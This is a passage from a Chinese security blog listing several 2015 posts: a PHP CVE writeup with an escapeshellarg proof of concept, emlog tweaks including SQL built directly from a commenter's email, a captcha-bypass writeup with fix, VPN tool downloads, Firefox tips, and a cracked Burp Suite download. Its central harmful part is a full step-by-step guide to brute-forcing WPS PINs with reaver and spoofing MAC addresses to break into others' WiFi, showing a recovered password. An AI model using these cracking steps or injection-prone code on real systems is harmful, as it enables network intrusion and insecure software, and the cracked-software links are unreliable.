PHP一次性爆出三个cve漏洞 网络安全

火狐截图_2015-06-21T03-01-35.019Z.png

研究人员在近期发现php三个漏洞。这三个漏洞分别是:os命令注入漏洞、在堆里面的整型溢出漏洞,还有个本地段错误漏洞。第一个是新漏洞,后两个是由于补丁修补不全重新导致的漏洞。

首先让我们来看第一个漏洞:OS command injection vulnerability in escapeshellarg[CVE-2015-4642.]

顾名思义,第一个漏洞是一个函数命令注入漏洞。

贴上poc:

poc.php

1
2
3
4
5
6
7
<?php
 $a 'a\\';
 $b 'b -c d\\';
 var_dump( $aescapeshellarg($a) );
 var_dump( $bescapeshellarg($b) );
 system( 'php arginfo.php ' escapeshellarg($a) . ' ' escapeshellarg($b) )
?>
1
2
3
4
<?php    
  print"--- ARG INFO ---\n" );     
  var_dump( $argv );   
?>

arginfo.php

根据poc,我们发现是一个escapeshellarg()函数命令注入漏洞。

图1:

火狐截图_2015-06-21T03-03-05.962Z.png

根据我的本地测试以及作者告诉我们如果输出图1中的内容,则表示你的php版本存在该漏洞。

图2:

火狐截图_2015-06-21T03-03-23.140Z.png

若是图2则表示漏洞已经修复。

输出output如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
string(2) "a\"
string(4) ""a\""
string(7) "b -c d\"
string(9) ""b -c d\""
--- ARG INFO ---
array(4) {
 [0]=>
 string(11) "arginfo.php"
 [1]=>
 string(4) "a" b"
 [2]=>
 string(2) "-c"
 [3]=>
  string(2) "d""
}

根据poc作者的解释:

前4行输出的结果是poc.php中var_dump函数的功能。通过比较输出结果与poc.php中第4、5两行,从escapeshellarg函数的输出结果可以看出攻击者可以设置一个字符串,而不是绕过一个参数。

同样,第10行在arginfo.php,这是通过var_dump输出的。通过比较,我们发现系统函数被调用在poc.php的时候是两个参数的,但是在命令行解释的时候是3个参数的。

根据https://git.php.net/?p=php-src.git;a=commitdiff;h=d2ac264ffea5ca2e85640b6736e0c7cd4ee9a4a9发布的补丁信息,我们发现他们过滤了。

通过我们实验室的小伙伴的测试,作者给的poc只有PHP 5.6.9版本受影响,另外测试的PHP 5.4.41不受影响。

接下来是第二个漏洞:PHP 5.6.9 Integer overflow in ftp_genlist() resulting in heap overflow [CVE-2015-4643]

http://p9.qhimg.com/t01f212d34223a1dc5a.png

根据Max Spelsberg的邮件内容,我们知道在recv loop,size 可以被递增两处。一个在‘size+=rcvd’,另一个在‘size++’。这意味着size可以递增超过rcvd的每次迭代,从而使溢出检查能够被绕过。

Size能够递增最多rcvd*2次迭代,这就是为什么我曾建议修复rcvd*2,而不仅仅是rcvd。

为了正确的修复这个bug,我建议除了溢出检查以外,还需要排除其他原因导致size通过rcvd增加,或者通过迭代。从而保证溢出检查不被绕过。

值得注意的是,并不是因为分支功能不是必要的,就没必要使其复杂化。

另外我们通过,http://git.php.net/?p=php-src.git;a=commitdiff;h=0765623d6991b62ffcd93ddb6be8a5203a2fa7e2补丁对比 ,

火狐截图_2015-06-21T03-06-35.302Z.png

发现对size进行了处理。

最后,让我们来看第三个漏洞:segfault in php_pgsql_meta_data

根据官方bug详情,用一段特殊的php代码,可以引起一个段错误在php_pgsql_meta_data。

1
pg_insert($conn'.',  array('foo' => 'bar')

这是因为#68741的不完全修复导致的。

Strok_r的返回值不在php_pgsql_meta_data检查导致的一个本地段错误。

详细补丁可通过https://git.php.net/?p=php-src.git;a=commitdiff;h=2cc4e69cc6d8dbc4b3568ad3dd583324a7c11d64查看比较。

综上所述,前两个漏洞要想利用,给看远程的PHP代码是怎么写的,才能触发,而且都是针对PHP 5.6.9这个版本的。最后一个是本地的漏洞,实际攻击用处不大。


标签: 漏洞 php cve

admin 发布于  2015-6-21 10:00 

Emlog教程 - 添加评论人等级输出 emlog

首先在module.php中添加以下函数


<pre style="overflow:auto" ;class="prettyprint lang-php linenums"><?php
//comment:输出评论人等级
function echo_levels($comment_author_email,$comment_author_url){
$DB = MySql::getInstance();
$adminEmail = '"[email protected]"';
if($comment_author_email==$adminEmail)
{
echo '<sy id="ys">(管理员)</sy>';
}
$sql = "SELECT cid as author_count,mail FROM emlog_comment WHERE mail != '' and mail = $comment_author_email and hide ='n'";
$res = $DB->query($sql);
$author_count = mysql_num_rows($res);
if($author_count>=0 && $author_count<5 && $comment_author_email!=$adminEmail)
echo '<sy id="ya">(打酱油的)</sy>';
else if($author_count>=5 && $author_count<10 && $comment_author_email!=$adminEmail)
echo '<sy id="yb">(匆匆过客)</sy>';
else if($author_count>=10 && $author_count<20 && $comment_author_email!=$adminEmail)
echo '<sy id="yc">(新生入住)</sy>';
else if($author_count>=20 && $author_count<30 && $comment_author_email!=$adminEmail)
echo '<sy id="yd">(常住住户)</sy>';
else if($author_count>=30 &&$author_count<40 && $comment_author_email!=$adminEmail)
echo '活跃住户';
else if($author_count>=40 && $author_coun<50 && $comment_author_email!=$adminEmail)
echo '积极住户';
else if($author_count>=50 && $author_coun<60 && $comment_author_email!=$adminEmail)
echo '五好住户';
else if($author_count>=60 && $author_coun<70 && $comment_author_email!=$adminEmail)
echo '十佳住户';
else if($author_count>=70 && $author_coun<80 && $comment_author_email!=$adminEmail)
echo '住户委员';
else if($author_count>=100 && $comment_author_email!=$adminEmail)
echo '住户代表';
}
?>

以上代码用于判断评论人所填写的e-mail统计次数,达到相应次数后输出不同的等级,所以在评论中只人e-mail不认名称。

其中上面的<sy id="y*">是给输出等级添加相应的css,一般是文字颜色,可直接写在CSS文件中。

调用代码:

<?php $mail_str="\"".strip_tags($comment['mail']).\"";echo_levels($mail_str,"\"".$comment['url']."\""); ?>

在需要调用的地方插入以上代码即可


标签: emlog

admin 发布于  2015-6-19 09:15 

修复emlog绕过验证码刷评论的bug 代码人生

 最近博客常常被人刷评论,最狠的一次被刷了10000多广告。

    先看看评论验证码是怎么检查的。

    emlog/include/controller/comment_controller.php,先获得$imgcode:

<pre style="overflow:auto" ;class="prettyprint lang-php linenums">$imgcode = isset($_POST['imgcode']) ? addslashes(trim(strtoupper($_POST['imgcode']))) : '';

  检查:


<pre style="overflow:auto" ;class="prettyprint lang-php linenums">} elseif (ISLOGIN == false && Option::get('comment_code') == 'y' && session_start() && $imgcode != $_SESSION['code']) {
emMsg('评论失败:验证码错误');
}


上述代码,几个判断依次是:

  1. 没有登录(非管理员和作者)
  2. 后台开启了评论验证码
  3. 开启session
  4. 将session中的code与$imgcode比较,不相等则验证码错误


    第4步明显有问题。熟悉php验证码流程的同学应该清楚,验证码生成的时候将会设置一个session,这里就是code,再和POST过来的也就是用户输入的做比较。

    然而如果我们并没有访问验证码生成页面,那么也就没生成session。那么$_SESSION['code']就是NULL。

    php中==是弱类型比较,NULL和''(空字符串)比较的结果是TRUE的。

    所以这里,我们的$imgcode如果输入一个空值,并且不去访问生成验证码的页面,那么这个$imgcode != $_SESSION['code']就不成立,就不会提示验证码错误,从而绕过了验证码检查逻辑。

    所以,我这里做测试。

    先正常留言,填写验证码,中途抓包:

    QQ20150614-1@2x.png

    将PHPSESSID修改成随意一个值,目的是让其$_SESSION不存在。再将imgcode修改成空:

    QQ20150614-2@2x.png

    发送数据包,可见没有提示失败(302跳转了),说明评论成功:

    QQ20150614-3@2x.png

    载入一个字典,即可刷评论:

    QQ20150614-4@2x.png

    QQ20150614-5@2x.png


    修复方法是判断session是否为空:


<pre style="overflow:auto" ;class="prettyprint lang-php linenums">empty($_SESSION['code']) || $_SESSION['code'] != $imgcode


  不满足这个条件即提示错误。

    另外的方法是和我博客一样,使用第三方验证码,简洁又方便:极验

还有就是像我博客这样,增加一个打勾的措施也可以在一定程度上防止机器人刷评论.

注:  这只是对开了验证码的有效,没有开验证码想我博客这样的可以不修改.

原文地址:https://www.leavesongs.com/PENETRATION/emlog-comment-captcha-bypass.html


admin 发布于  2015-6-18 14:22 

0617更新可用的免费VPN,电脑手机翻墙工具 翻墙工具

全部都是干货分享,请注意,博主的初衷是方便大家搜索资料学习,请不要干违法犯罪的勾当,否则后果与博客无关. 

安卓,苹果,Mac,Windows 三平台支持的,免费加速器下载 2020最新可用 下载链接:点击下载

最新可用:https://mrxn.net/free/168.html
一:手机版工具:

1.Psiphon赛风3(免费开源VPN软件)v85(0616)安卓版

2.FreeBrowser自由浏览器v1.5 安卓版

3.sFly(畅游全球网络利器)V1.0.9 官方安卓版

4.Hola(免费手机VPN软件)v1.7.603 安卓免费版

5.VPN大师(VPN Master)v2.0.0 汉化安卓版

6.寻路VPN下载(手机查资料免费VPN利器)V1.50 安卓版

7.查资料路由器Fqrouter(手机VPN软件)V2.12.7安卓版

8.EasyVPN(无须ROOT的VPN软件)V1.9 安卓去广告版


二:电脑版工具:

1.网桥代理大师(免费VPN代理软件)V2015.6.6免费版

2.Mxvpn网络加速器V20130826 官方免费版


所有软甲打包下载地址:

百度网盘下载:链接:

http://pan.baidu.com/s/1dDuBZc1 密码:kykc

国外网盘下载:

https://userscloud.com/jt071fuju4ph

https://userscloud.com/is0xbyc23vx7
https://userscloud.com/o4h6ao2do8ac
https://userscloud.com/qz9700e8g082







标签: 查资料 VPN

admin 发布于  2015-6-17 11:25 

解决火狐浏览器启动缓慢或者假死的四种方法小计 技术文章

作为一个前段开发者,火狐和Google浏览器是必备的工具之一,但是我最近发现,打开火狐速度很慢,有的时候像是假死,需要等几十秒钟才能打开,我上网搜索了一下,发现很多人都存在这个问题,我找到了解决的方法,在此小计一下,希望可以帮到那些出现同样问题的朋友。下面提供了四中方法解决:

方法1:增加启动参数

06-09-37-01.png


右键点击火狐浏览器的快捷方式,在“属性”—“快捷方式”—“目标”,加上参数“ /Prefetch:1”。即:"C:Program Files/Mozilla Ffoxfirefox.exe" /Prefetch:1”(注意:“/”前有空格)还有一个方法是增加“ -turbo”,具体操作方法同上面的一样。


方法2: 修改about:config


本来这个方法在一些文章中说是加快浏览速度的,但是我发现,也可以起到减少火狐启动时间的问题。


1.在火狐地址栏里输入“about:config”,等系统调用完毕之后按照下列步骤:


2.更改 "network.http.pipelining" 为 ture


3.更改 "network.http.proxy.pipelining" 为 ture


4.更改 "network.http.pipelining.maxrequests" 为 8


方法3:其他方法


比如关闭其他扩展插件法、去掉skin和Theme、取消自动更新等等方法。


有人说如果使用了SWITCH PROXY插件的话,其中NOTIFY ME OF UPDATE选项会造成火狐浏览器假死。还有SAVED SESSION/RESTORE TAB也可能造成。


方法4: 关闭杀毒软件法


很多朋友说火狐打开缓慢是由于杀毒软件的原因,可能是与瑞星或者卡巴斯基等杀毒软件冲突了,所以关闭了杀毒软件打开就快了,呵呵。这样做其实也没啥,因为现在网上绝大多数的病毒都是针对IE内核的浏览器,就算用火狐裸奔也是十分安全的。


总之,火狐打开速度缓慢的原因可能很多种,要根据你的实际情况来判断和调整。Mrxn就总结到这里,以后有新的方法,我会继续更新的,欢迎转载,请保留链接,谢谢。

标签: 火狐 启动

admin 发布于  2015-6-15 08:35 

emlog 控制导航显示条数的方法 emlog

方法其实很简单的,只要在模版文件module.php中找到

readCache('navi');

后面加

$i=0;

然后在

foreach($navi_cache as $value):

后面加

$i++;if($i>=7)break;

其中的7表示显示前7个导航。本教程以默认模板为例。

标签: emlog

admin 发布于  2015-6-12 22:32 

使用猜解PIN破解无线路由密码 网络安全

目录:

  • 方法一:Kali或BTx
  • 方法二:CDlinux 水滴minidwep-gtk
  • 方法三:CDlinux 打气桶Inflator

路由器的pin码是快速连接功能的识别码。比如你设置个非常复杂的无线密码,每次有设备加入无线网络的时候,输入密码是很麻烦的。这个时候就可以通 过输入8位的pin码,路由器识别后就允许加入网络了,相当于输入了无线密码。在win7下设置路由器的时候要求pin码,也是一种识别验证路由器的方 式。另外这个码也是可以变化的,可以在路由器的qss或wps功能里查询到。默认的pin码在路由器的背面有。

WPS能帮助用户自动设置网络名(SSID)、配置最高级别的WPA2安全密钥,具备这一功能的无线产品往往在机身上设计有一个功能键,称为WPS 按钮,用户只需轻轻按下该按钮或输入PIN码,再经过两三步简单操作即可完成无线加密设置,同时在客户端和路由器之间建立起一个安全的连接。TP- LINK上的叫QSS。

现在默认关闭wps,防pin的路由越来越多了,再不试试猜解PIN破解无线路由密码以后就没机会了。三种方法原理大致一样,只是工具不同而已。

方法一:Kali或BTx

1. Ifconfig #查看当前是否存在无线网卡,iwconfig更简洁,只显示无线网卡信息。

root@NIGER:~# ifconfig
wlan0     Link encap:Ethernet  HWaddr 00:e0:4c:6b:96:bd  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

2. airmon-ng start wlan0 #开启无线网卡监听模式

root@NIGER:~# airmon-ng start wlan0
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID Name
3135 dhclient
3167 NetworkManager
3626 wpa_supplicant
Interface Chipset  Driver
wlan0  Realtek RTL8187L rtl8187 - [phy0]
    (monitor mode enabled on mon0)

3. ifconfig #查看一下是否开启成功,成功有话会出现mon0网卡

root@NIGER:~# ifconfig
mon0      Link encap:UNSPEC  HWaddr 00-E0-4C-6B-96-BD-3A-30-00-00-00-00-00-00-00-00  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:358 errors:0 dropped:358 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:28458 (27.7 KiB)  TX bytes:0 (0.0 B)
wlan0     Link encap:Ethernet  HWaddr 00:e0:4c:6b:96:bd  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

4. wash –i mon0 #列出mon0网卡接收到的开了wps的无线信息,并不是全部无线信息,选择信号最好的,RSSI越大越好,如下,-58最大

root@NIGER:~# wash -i mon0
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
C0:61:18:00:E7:40       1            -68        1.0               No                CAT-MAITAI
5C:63:BF:44:29:8A       1            -64        1.0               No                dashizi
F4:EC:38:1D:1F:C0       4            -58        1.0               No                TP-LINK_1D1FC0
0C:72:2C:FD:F7:AC      11            -60        1.0               No                myWLAN
^C

5. reaver –i mon0 –b mac –vv –c channel –p pin(pin未知) #-i指定网卡 -b指定路由地址 -c 指定无线信道 -p 指定pin码,一位也不知道就不用加-p,如果知道前4位就输入前4位

root@NIGER:~# reaver -i mon0 -b F4:EC:38:1D:1F:C0 -vv -c 4
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from F4:EC:38:1D:1F:C0
[+] Switching mon0 to channel 4
[+] Associated with F4:EC:38:1D:1F:C0 (ESSID: TP-LINK_1D1FC0)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Sending WSC NACK
[+] Trying pin 12345670
……
[+] 94.85% complete @ 2014-08-05 22:26:18 (7 seconds/pin)
[+] Max time remaining at this rate: 1:06:09 (567 pins left to try)
[+] Trying pin 01894264
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3056 seconds
[+] WPS PIN: '01894264'
[+] WPA PSK: 'anchao1202'
[+] AP SSID: 'TP-LINK_1D1FC0'

6. reaver –i mon –b mac –p pin(pin已知) #知道pin码就可直接出密码

root@NIGER:~# reaver -i mon0 -b F4:EC:38:1D:1F:C0 -p 01894264
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from F4:EC:38:1D:1F:C0
[+] Associated with F4:EC:38:1D:1F:C0 (ESSID: TP-LINK_1D1FC0)
[+] WPS PIN: '01894264'
[+] WPA PSK: 'anchao1202'
[+] AP SSID: 'TP-LINK_1D1FC0'

7. 小技巧一:伪造自己mac地址,

root@NIGER:~# ifconfig wlan0 down
root@NIGER:~# macchanger -m 00:11:22:33:44:55 wlan0
Current MAC: xx:xx:xx:xx:xx:xx
Faked MAC: 00:11:22:33:44:55
root@NIGER:~# ifconfig wlan0 up
root@NIGER:~# ifconfig mon0 down
root@NIGER:~# macchanger -m 00:11:22:33:44:55 mon0
Current MAC: xx:xx:xx:xx:xx:xx
Faked MAC: 00:11:22:33:44:55
root@NIGER:~# ifconfig mon0 up

方法二:CDlinux 水滴minidwep-gtk

1.S扫描

w1

2.Reaver 添加-N参数使更准确稳定

w2

w3

w4

3.技巧一:自己设置pin码,意思是前4位先跑什么范围,如下图,会先猜测0-999,然后是7000-7999,

w5

w6

4.技巧二:修改记录文件设置从上次记录开始

w7

方法三:CDlinux 打气桶Inflator

1.开启网卡混杂模式

w8

2.扫描网络

w9

3.选中网络后设定参数(pin只能填4或8位或不选),这里为省跑pin的时间直接输入pin了

w10

4.最后破解出来,没出密码,打气筒好像经常有这个问题

w11

注:原文作者:Niger 我只是收藏. PS:我用水滴特爽 几乎是攻无不破 屡试屡胜!


admin 发布于  2015-6-11 01:26 

记一次对GFW防火墙的探究 网络安全

[该文章已加密,请点击标题输入密码访问]


admin 发布于  2015-6-11 00:42 

emlog修默认改导航栏地址 emlog

如果EMLOG使用的是Windows的服务器,点击前台的登录,经常会出现404问题。
因为服务器无法判定admin的路径是文件还是目录,如果访问mrxn.net/admin/,后面加上斜杠,指明是目录,则不会出现404的问题。
进入EMLOG后台,导航,选择登录的导航,修改,会提示默认导航无法修改,出现这种问题,需要修改程序文件。
使用编辑工具(不能使用记事本),打开admin/navbar.php文件后
查找并删除

    if ($type != Navi_Model::navitype_custom) { $url = '该导航地址由系统生成,无法修改'; }

    此段代码是为了判定,导航是否是默认导航,如果是的话,就不显示导航地址,只显示这段文字。
    删除了上面一段代码之后,发现文本框虽然显示了导航地址,但还是不可修改状态,

    继续查找并删除

$conf_isdefault = $type != Navi_Model::navitype_custom ? 'disabled="disabled"' : '';

    此段代码设定了,如果是默认导航的话,那文本框就不可修改。
    以上步骤搞定了以后,虽然文本框可以修改,可以提交,但发现修改后还是不能生效

    最后,查找以下代码:

    if ($isdefault == 'n') { $navi_data['url'] = $url; } 

    留下中间一行,修改为:

    $navi_data['url'] = $url;

    此段代码是在提交的时候判断导航是否为默认导航,如果不是默认导航才修改,去掉修改条件就OK。

    这下,把登录的地址,加个“/”改为“admin/”就搞定了~

标签: emlog

admin 发布于  2015-6-10 23:34 

渗透测试神器Burp Suite v1.6.17(含破解版下载)--转 安全工具

QQ图片20150506002920.jpg

本文提供的破解方式仅供软件试用,请于24小时内删除

众所周知,Burp Suite是响当当的web应用程序渗透测试集成平台。从应用程序攻击表面的最初映射和分析,到寻找和利用安全漏洞等过程,所有工具为支持整体测试程序而无缝地在一起工作。

平台中所有工具共享同一robust框架,以便统一处理HTTP请求、持久性、认证、上游代理、日志记录、报警和可扩展性。Burp Suite允许攻击者结合手工和自动技术去枚举、分析、攻击Web应用程序。

Burp Suite的重要特性

拦截代理(Proxy),你可以检查和更改浏览器与目标应用程序间的流量;
可感知应用程序的网络爬虫(Spider),它能完整的枚举应用程序的内容和功能;
高级扫描器,执行后它能自动地发现web应用程序的安全漏洞;
入侵测试工具(Intruder),用于执行强大的定制攻击去发现及利用不同寻常的漏洞;
重放工具(Repeater),一个靠手动操作来触发单独的HTTP 请求,并分析应用程序响应的工具;
会话工具(Sequencer),用来分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具;
解码器,进行手动执行或对应用程序数据者智能解码编码的工具;
扩展性强,可以让你加载Burp Suite的扩展,使用你自己的或第三方代码来扩展Burp Suit的功能。

Burp Suite版本更新手札

scanner_burp_suite.png

v1.6.15

这一版本引入了一个全新的特性:Burp Collaborator(拍档)。

Burp Collaborator是一个外部服务器,它可以用来帮助发现各种各样的漏洞并拥有变革web安全测试的潜力。基于这一平台,开发商添加了许多令人激动的新功能。

这个版本引入了一些新型扫描仪检测方式,并通过了新功能测试。

v1.6.16

这一版本解决了上一版本中新特性Burp Collaborator的一些问题,包括即使在使用者停用Collaborator的情况下,Burp有时会发送一些Collaborator相关测试负载。

这个版本仍然在检测Burp Collaborator是否还有更多问题的测试中。

v1.6.17

这一版本中包含许多小的改进和修正:

在算法可用的情况下,代理使用SHA256来生成CA以及每主机证书;否则,故障转移到使用SHA1。更新至基于SHA256的CA证书能够移除一些浏览器中的SSL警告。
在代理/选项/代理侦听器上有一个新按钮迫使Burp生成自己的CA证书。你将需要重启Burp来激活这个新变化,然后在浏览器中安装新的证书。这个功能可以用于切换至基于SHA286的CA证书。
修复了之前“从文件中粘帖”的功能缺陷,该缺陷有时会造成Burp在选定的文件中保持锁定。
修复了有时提取HTML内容在结果视图窗中仍呈现为HTML的“提取grep”的功能缺陷。
修复了浏览器有时发送包含代理服务器被使用的请求。存在一些攻击试图使用一个标题引诱浏览器访问一些含有敏感数据的恶意网站。而代理/选项/音乐中的新选择将帮助你远离这些。
目前爬虫在从响应文本中抽取链接的时候会忽略Burp Collaborator URLs。一些应用程序包含了储存和检索文本功能。当使用Burp扫面这些应用是,它们倾向于储存一些或全部Burp在扫描时发送的有效负载,并在之后的响应中返还。Burp最好在爬虫时不返还任何Collaborator URLs给站点。

v1.6.17版破解版:下载地址 (警告:请自行检测程序安全性,仅供尝鲜,24小时内自觉删除)


admin 发布于  2015-6-10 22:34